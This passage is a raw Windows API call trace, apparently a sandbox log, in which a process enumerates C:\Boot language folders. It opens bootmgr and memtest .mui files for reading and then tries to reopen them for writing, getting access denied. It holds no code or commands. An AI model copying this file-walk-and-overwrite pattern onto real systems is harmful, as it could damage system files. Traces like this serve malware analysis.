(in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f0c8 | out: hHeap=0x20000) returned 1 [0070.450] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0070.450] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0070.450] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0070.450] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x533b8 [0070.450] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0070.450] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0070.450] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x538c8 [0070.450] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x533b8 | out: hHeap=0x20000) returned 1 [0070.450] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.450] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.450] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.450] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.450] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x538c8 | out: hHeap=0x20000) returned 1 [0070.450] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0070.450] AreFileApisANSI () returned 1 [0070.450] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Boot\\pl-PL\\memtest.exe.mui", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Boot\\pl-PL\\memtest.exe.mui", lpUsedDefaultChar=0x0) returned 30 [0070.450] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0070.450] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.450] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.450] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0070.450] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0070.450] AreFileApisANSI () returned 1 [0070.450] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x885b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 30 [0070.450] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x3c) returned 0x538c8 [0070.450] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x885b8, cbMultiByte=-1, lpWideCharStr=0x538c8, cchWideChar=30 | out: lpWideCharStr="C:\\Boot\\pl-PL\\memtest.exe.mui") returned 30 [0070.451] CreateFileW (lpFileName="C:\\Boot\\pl-PL\\memtest.exe.mui" (normalized: "c:\\boot\\pl-pl\\memtest.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x41c [0070.451] GetFileType (hFile=0x41c) returned 0x1 [0070.451] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x538c8 | out: hHeap=0x20000) returned 1 [0070.451] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0070.452] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0070.452] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0070.452] CloseHandle (hObject=0x41c) returned 1 [0070.452] AreFileApisANSI () returned 1 [0070.459] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x885b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 30 [0070.459] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x3c) returned 0x53370 [0070.459] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x885b8, cbMultiByte=-1, lpWideCharStr=0x53370, cchWideChar=30 | out: lpWideCharStr="C:\\Boot\\pl-PL\\memtest.exe.mui") returned 30 [0070.459] CreateFileW (lpFileName="C:\\Boot\\pl-PL\\memtest.exe.mui" (normalized: "c:\\boot\\pl-pl\\memtest.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0070.459] GetLastError () returned 0x5 [0070.459] GetLastError () returned 0x5 [0070.459] SetLastError (dwErrCode=0x5) [0070.459] GetLastError () returned 0x5 [0070.459] SetLastError (dwErrCode=0x5) [0070.459] GetLastError () returned 0x5 [0070.459] SetLastError (dwErrCode=0x5) [0070.459] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53370 | out: hHeap=0x20000) returned 1 [0070.459] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0070.459] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0070.459] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0070.459] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.460] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.460] FindNextFileW (in: hFindFile=0x78290, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x313f498, ftCreationTime.dwHighDateTime=0x3a, ftLastAccessTime.dwLowDateTime=0x313f420, ftLastAccessTime.dwHighDateTime=0x77892b2c, ftLastWriteTime.dwLowDateTime=0x68f48, ftLastWriteTime.dwHighDateTime=0x313f210, nFileSizeHigh=0x3a, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="", cAlternateFileName="渘Ĉ㪀ā湈Ĉ̓뎠")) returned 0 [0070.460] FindClose (in: hFindFile=0x78290 | out: hFindFile=0x78290) returned 1 [0070.460] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d080 [0070.460] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f2c8 [0070.460] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0070.460] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f2c8 | out: hHeap=0x20000) returned 1 [0070.460] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0070.460] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88810 | out: hHeap=0x20000) returned 1 [0070.460] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0070.460] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0070.460] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0070.460] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46898 | out: hHeap=0x20000) returned 1 [0070.460] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cee0 [0070.460] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0070.460] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0070.460] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0070.460] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d010 [0070.460] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f2c8 [0070.460] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0070.460] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f2c8 | out: hHeap=0x20000) returned 1 [0070.460] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0070.460] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0070.460] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0070.460] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.460] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.460] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.460] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.460] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0070.460] AreFileApisANSI () returned 1 [0070.460] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Boot\\pt-BR", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Boot\\pt-BR", lpUsedDefaultChar=0x0) returned 14 [0070.460] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.460] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.461] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0070.461] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0070.461] AreFileApisANSI () returned 1 [0070.461] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x313f8e8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 14 [0070.461] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1c) returned 0x88748 [0070.461] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x313f8e8, cbMultiByte=-1, lpWideCharStr=0x88748, cchWideChar=14 | out: lpWideCharStr="C:\\Boot\\pt-BR") returned 14 [0070.461] CreateFileW (lpFileName="C:\\Boot\\pt-BR" (normalized: "c:\\boot\\pt-br"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0070.461] GetLastError () returned 0x5 [0070.461] GetLastError () returned 0x5 [0070.461] SetLastError (dwErrCode=0x5) [0070.461] GetLastError () returned 0x5 [0070.461] SetLastError (dwErrCode=0x5) [0070.461] GetLastError () returned 0x5 [0070.461] SetLastError (dwErrCode=0x5) [0070.461] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0070.461] AreFileApisANSI () returned 1 [0070.461] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x313f8e8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 14 [0070.461] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1c) returned 0x88400 [0070.461] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x313f8e8, cbMultiByte=-1, lpWideCharStr=0x88400, cchWideChar=14 | out: lpWideCharStr="C:\\Boot\\pt-BR") returned 14 [0070.462] CreateFileW (lpFileName="C:\\Boot\\pt-BR" (normalized: "c:\\boot\\pt-br"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0070.462] GetLastError () returned 0x5 [0070.462] GetLastError () returned 0x5 [0070.462] SetLastError (dwErrCode=0x5) [0070.462] GetLastError () returned 0x5 [0070.462] SetLastError (dwErrCode=0x5) [0070.462] GetLastError () returned 0x5 [0070.462] SetLastError (dwErrCode=0x5) [0070.462] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0070.462] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0070.462] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0070.462] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.462] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.462] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.462] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.462] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0070.462] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0070.462] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0070.462] FindNextFileW (in: hFindFile=0x78e50, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4938cb0, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa010f167, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef6714dc, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="pt-PT", cAlternateFileName="")) returned 1 [0070.462] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0070.462] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f0c8 [0070.462] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0070.462] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0070.462] FindFirstFileExW (in: lpFileName="C:\\Boot\\pt-BR\\*", fInfoLevelId=0x0, lpFindFileData=0x313ef40, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x313ef40) returned 0x78450 [0070.462] FindNextFileW (in: hFindFile=0x78450, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4912aed, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef6678d6, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xef6678d6, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0070.462] FindNextFileW (in: hFindFile=0x78450, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4912aed, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc4912aed, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x2112e17f, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12b60, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0070.462] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0070.462] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0070.463] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0070.463] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0070.463] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0070.463] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0070.463] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0070.463] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0070.463] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0070.463] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0070.463] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0070.463] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46438 [0070.463] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0070.463] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d010 [0070.463] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f2c8 [0070.463] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0070.463] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f2c8 | out: hHeap=0x20000) returned 1 [0070.463] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf20 [0070.463] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f2c8 [0070.463] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0070.463] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f2c8 | out: hHeap=0x20000) returned 1 [0070.463] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0070.463] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0070.463] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0070.463] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53370 [0070.463] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0070.463] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0070.463] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x536d0 [0070.463] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53370 | out: hHeap=0x20000) returned 1 [0070.463] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.463] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.463] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.463] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.463] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x536d0 | out: hHeap=0x20000) returned 1 [0070.463] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0070.463] AreFileApisANSI () returned 1 [0070.463] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Boot\\pt-BR\\bootmgr.exe.mui", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Boot\\pt-BR\\bootmgr.exe.mui", lpUsedDefaultChar=0x0) returned 30 [0070.463] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0070.464] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.464] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.464] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0070.464] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0070.464] AreFileApisANSI () returned 1 [0070.464] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88798, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 30 [0070.464] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x3c) returned 0x53298 [0070.464] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88798, cbMultiByte=-1, lpWideCharStr=0x53298, cchWideChar=30 | out: lpWideCharStr="C:\\Boot\\pt-BR\\bootmgr.exe.mui") returned 30 [0070.464] CreateFileW (lpFileName="C:\\Boot\\pt-BR\\bootmgr.exe.mui" (normalized: "c:\\boot\\pt-br\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x41c [0070.464] GetFileType (hFile=0x41c) returned 0x1 [0070.464] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53298 | out: hHeap=0x20000) returned 1 [0070.464] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0070.464] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0070.465] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0070.465] CloseHandle (hObject=0x41c) returned 1 [0070.465] AreFileApisANSI () returned 1 [0070.465] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88798, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 30 [0070.465] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x3c) returned 0x53298 [0070.465] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88798, cbMultiByte=-1, lpWideCharStr=0x53298, cchWideChar=30 | out: lpWideCharStr="C:\\Boot\\pt-BR\\bootmgr.exe.mui") returned 30 [0070.465] CreateFileW (lpFileName="C:\\Boot\\pt-BR\\bootmgr.exe.mui" (normalized: "c:\\boot\\pt-br\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0070.465] GetLastError () returned 0x5 [0070.465] GetLastError () returned 0x5 [0070.465] SetLastError (dwErrCode=0x5) [0070.465] GetLastError () returned 0x5 [0070.465] SetLastError (dwErrCode=0x5) [0070.465] GetLastError () returned 0x5 [0070.465] SetLastError (dwErrCode=0x5) [0070.465] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53298 | out: hHeap=0x20000) returned 1 [0070.465] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0070.466] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0070.466] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0070.466] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.466] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.466] FindNextFileW (in: hFindFile=0x78450, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4938cb0, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef65dc94, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf2f8fc0d, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xb1a0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0070.466] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0070.466] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0070.466] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0070.466] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0070.466] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0070.466] HeapFree (in: hHeap=0x20000, dwFlags=0x0, 